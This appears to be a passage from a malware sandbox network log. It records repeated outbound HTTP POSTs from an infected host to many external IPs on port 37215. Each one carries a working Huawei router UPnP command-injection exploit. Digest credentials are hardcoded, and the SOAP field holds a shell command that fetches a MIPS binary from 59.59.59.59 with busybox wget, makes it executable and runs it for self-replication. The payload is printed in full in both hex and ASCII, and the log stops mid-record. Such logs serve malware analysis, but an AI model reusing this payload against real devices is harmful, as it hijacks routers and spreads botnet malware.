                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1778192.168.2.1551480157.193.28.22737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.004460096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1779192.168.2.154354041.251.133.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.004806995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1780192.168.2.155071041.155.44.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.923470974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1781192.168.2.154102413.108.79.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.923502922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1782192.168.2.155085041.110.10.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.923542023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1783192.168.2.155377641.60.128.24437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.923558950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1784192.168.2.153846281.51.218.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.923595905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1785192.168.2.153805864.246.175.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.923613071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1786192.168.2.1551784157.0.92.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.950704098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1787192.168.2.1555066197.108.187.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.950737953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
